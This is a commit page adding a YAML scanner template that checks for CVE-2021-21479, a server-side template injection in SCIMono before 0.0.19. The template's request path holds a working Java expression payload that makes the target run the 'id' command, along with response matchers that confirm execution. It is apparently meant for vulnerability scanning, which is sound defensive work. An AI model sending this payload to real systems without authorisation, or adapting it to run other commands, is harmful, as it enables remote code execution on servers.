Merge pull request #2076 from dwisiswant0/GHSL-2020-227
Server-Side Template Injection leading to unauthenticated Remote Code Execution in SCIMono - CVE-2021-21479patch-1
commit
94511129f6
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2021-21479
|
||||
|
||||
info:
|
||||
name: SCIMono < v0.0.19 Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
|
||||
description: |
|
||||
In SCIMono before 0.0.19, it is possible for an attacker to inject and
|
||||
execute java expression compromising the availability and integrity of the system.
|
||||
tags: cve,cve2021,scim,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "The attribute value"
|
||||
- "java.lang.UNIXProcess@"
|
||||
- "has invalid value!"
|
||||
- '"status" : "400"'
|
||||
part: body
|
||||
condition: and
|
Loading…
Reference in New Issue